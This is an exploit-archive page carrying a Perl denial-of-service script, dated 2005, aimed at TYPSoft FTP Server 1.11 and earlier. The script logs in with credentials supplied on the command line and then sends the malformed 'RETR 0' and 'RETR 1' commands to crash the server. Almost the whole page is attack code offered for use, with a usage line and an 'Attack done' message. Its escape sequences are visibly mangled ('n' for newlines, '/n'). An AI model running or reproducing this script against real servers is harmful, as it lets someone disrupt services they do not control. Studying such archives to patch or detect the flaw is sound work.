TYPSoft FTP Server <= 1.11 (RETR) Denial of Service Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : TYPSoft FTP Server <= 1.11 (RETR) Denial of Service Vulnerability
# Published : 2005-10-14
# Author : wood
# Previous Title : Opera <= 8.02 Remote Denial of Service Exploit (2)
# Next Title : RBExplorer 1.0 (Hijacking Command) Denial of Service Exploit

#!/usr/bin/perl

use IO::Socket;
use Socket;

print "n-= TYPSoft FTP Server <= v1.11 DOS =-n";
print "-= wood (at) Exploitlabs.com =-nn";

if($#ARGV < 2 | $#ARGV > 3) { die "usage: perl typsoft-1.11-DOS.pl <host> <user> <pass> [port]n" };
if($#ARGV > 2) { $prt = $ARGV[3] } else { $prt = "21" };

$adr = $ARGV[0];
$usr = $ARGV[1];
$pas = $ARGV[2];
$err1 = "RETR 0";
$err2 = "RETR 1";


$remote = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$adr,
PeerPort=>$prt, Reuse=>1) or die "Error: cant connect to $adr:$prtn";

$remote->autoflush(1);

print $remote "USER $usrn" and print "1. Sending : USER $usr...n" or die
"Error: cant send usern";

print $remote "PASS $pasn" and print "2. Sending : PASS $pas...n" or die
"Error: cant send passn";

print $remote "$err1/n" and print "3. Sending : ErrorCode 1...n";
print $remote "$err2/n" and print "4. Sending : ErrorCode 2...nn"or die 
"Error: cant send error coden";

print "Attack done. press any key to exitn";
$bla= <STDIN>;
close $remote; 

# www.Syue.com [2005-10-14]